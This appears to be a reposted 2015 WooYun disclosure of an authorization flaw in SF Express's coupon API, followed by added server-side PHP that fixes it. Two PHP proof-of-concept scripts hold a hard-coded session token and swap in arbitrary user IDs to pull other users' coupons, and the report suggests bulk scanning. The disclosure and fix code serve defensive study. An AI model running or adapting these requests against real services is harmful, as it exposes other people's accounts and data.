
SF Express app user-verification flaw allows bulk harvesting of other users' coupons

2015-02-09 01:40

Code:
<?php
$nn = 800008231073; // target account ID (user_id); the report's sample value
$url = "http://abs-core.sf-express.com/api/user/getCoupons";
$ch = curl_init();
// POST body: user_id comes from $nn, not from the authenticated session
$request = 'status=%27EFFE%27%2C&amt=&couponType=&method=getCoupons&user_id=' . $nn;
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
curl_setopt($ch, CURLOPT_URL, $url);
// token and userid headers are the tester's own; the server never checks that they match user_id
curl_setopt($ch, CURLOPT_HTTPHEADER, array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008495436'));
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt($ch, CURLOPT_NOSIGNAL, 500);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$re = curl_exec($ch);
curl_close($ch);
$re = json_decode($re);
print_r($re);



The above is a demo.

$nn is the account ID and can be changed at will, so it is easy to build a bulk scanning tool.

Proof of vulnerability:

[Screenshot: QQ截图20141225162220.jpg]

For example, these are the coupons found by scanning.

Fix:

array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008495436'));

Validate these: the server should check that the token and the userid header actually belong to the account whose user_id is being requested, instead of returning coupons for whatever user_id the client supplies.



Code:
<?php
login('800008231073');

function login($nn) { // same request as the demo above, wrapped in a function that returns the decoded response
    $url = "http://abs-core.sf-express.com/api/user/getCoupons";
    $ch = curl_init();
    // POST body: user_id is the function argument, independent of the token/userid headers
    $request = 'status=%27EFFE%27%2C&amt=&couponType=&method=getCoupons&user_id=' . $nn;
    curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008490435'));
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
    curl_setopt($ch, CURLOPT_NOSIGNAL, 500);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $re = curl_exec($ch);
    curl_close($ch);
    $re = json_decode($re);
    print_r($re);
    return $re;
}
?>
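An added example, not code from the original report or from SF Express, of the server-side check the fix above calls for, written in PHP to match the PoC. The handler resolves the caller's identity from the token alone and refuses any request whose user_id parameter or userid header names a different account, so changing user_id no longer returns someone else's coupons. The sessions and coupons tables, the helper names resolveTokenOwner() and fetchCouponsFor(), the status whitelist and the PDO DSN are all assumptions made for illustration.

```php
<?php
// Added example (not from the original report): authorization check for a
// getCoupons handler. Assumed (hypothetical) schema: a sessions table mapping
// an opaque token to the user it was issued to, and a coupons table keyed by
// user_id. Helper names and the DSN are placeholders, not SF Express code.

declare(strict_types=1);

/** Return the user id the token was issued to, or null if unknown or expired. */
function resolveTokenOwner(PDO $db, string $token): ?string
{
    $stmt = $db->prepare(
        'SELECT user_id FROM sessions WHERE token = :token AND expires_at > NOW()'
    );
    $stmt->execute([':token' => $token]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (string) $row['user_id'];
}

/** Coupons for one user; the user id is always the server-resolved one. */
function fetchCouponsFor(PDO $db, string $userId, string $status): array
{
    $stmt = $db->prepare(
        'SELECT coupon_id, amount, coupon_type, status FROM coupons
          WHERE user_id = :uid AND status = :status'
    );
    $stmt->execute([':uid' => $userId, ':status' => $status]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/**
 * Handle POST /api/user/getCoupons.
 * The vulnerable endpoint trusted the client-supplied user_id (and the userid
 * header); here the identity is derived from the token only.
 */
function handleGetCoupons(PDO $db, array $headers, array $post): array
{
    $token = $headers['token'] ?? '';
    if ($token === '') {
        http_response_code(401);
        return ['error' => 'missing token'];
    }

    $owner = resolveTokenOwner($db, $token);
    if ($owner === null) {
        http_response_code(401);
        return ['error' => 'invalid or expired token'];
    }

    // Defence in depth: if the client still sends user_id or a userid header,
    // it must match the token owner; a mismatch is refused and logged as a
    // probable IDOR probe so it can be picked up by monitoring.
    $claims = [
        'user_id' => $post['user_id'] ?? null,
        'userid'  => $headers['userid'] ?? null,
    ];
    foreach ($claims as $name => $claimed) {
        if ($claimed !== null && (string) $claimed !== $owner) {
            error_log(sprintf('IDOR attempt: token owner %s sent %s=%s', $owner, $name, (string) $claimed));
            http_response_code(403);
            return ['error' => 'forbidden'];
        }
    }

    // Only whitelisted status values reach the query (assumed set of statuses).
    $status = $post['status'] ?? 'EFFE';
    if (!in_array($status, ['EFFE', 'USED', 'EXPIRED'], true)) {
        http_response_code(400);
        return ['error' => 'bad status'];
    }

    return ['user_id' => $owner, 'coupons' => fetchCouponsFor($db, $owner, $status)];
}

// Entry point under a web server (constructed; DSN and credentials are placeholders).
if (PHP_SAPI !== 'cli') {
    $db = new PDO('mysql:host=localhost;dbname=coupons', 'app', 'placeholder-password');
    $headers = array_change_key_case(getallheaders(), CASE_LOWER);
    header('Content-Type: application/json');
    echo json_encode(handleGetCoupons($db, $headers, $_POST));
}
```

The important design choice is that the lookup key passed to fetchCouponsFor() is $owner, which the server derived from the token, never the request's own user_id. Rejecting a mismatching user_id rather than silently ignoring it also gives the logs a clear signal of enumeration attempts like the one in the report.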

Source: www.wooyun.org/bugs/wooyun-2015-088606
